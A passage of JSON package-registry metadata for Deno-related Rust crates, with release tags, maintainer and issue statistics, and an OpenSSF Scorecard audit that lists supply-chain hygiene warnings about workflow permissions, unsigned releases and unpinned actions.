Hub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T20:52:20.339Z","dependent_packages_count":0,"downloads":1427,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.14524615379403,"dependent_repos_count":13.914778713989993,"dependent_packages_count":18.37979949925634,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.47994145568012},"purl":"pkg:cargo/deno_cli_parser","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cli_parser","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cli_parser","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cli_parser/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-06-18T21:20:19.902Z","updated_at":"2026-06-18T21:20:19.902Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-06-18T21:20:20.054Z","updated_at":"2026-06-18T21:20:20.054Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14712069,"name":"fast-registry-json","ecosystem":"cargo","description":"SIMD-accelerated JSON scanner for indexing npm registry packuments","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2026-07-03T09:48:25.535Z","latest_release_published_at":"2026-07-08T11:14:03.845Z","latest_release_number":"0.2.0","last_synced_at":"2026-08-29T21:56:51.383Z","created_at":"2026-07-03T12:34:50.252Z","updated_at":"2026-08-30T22:49:58.837Z","registry_url":"https://crates.io/crates/fast-registry-json/","install_command":"cargo install fast-registry-json","documentation_url":"https://docs.rs/fast-registry-json/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: 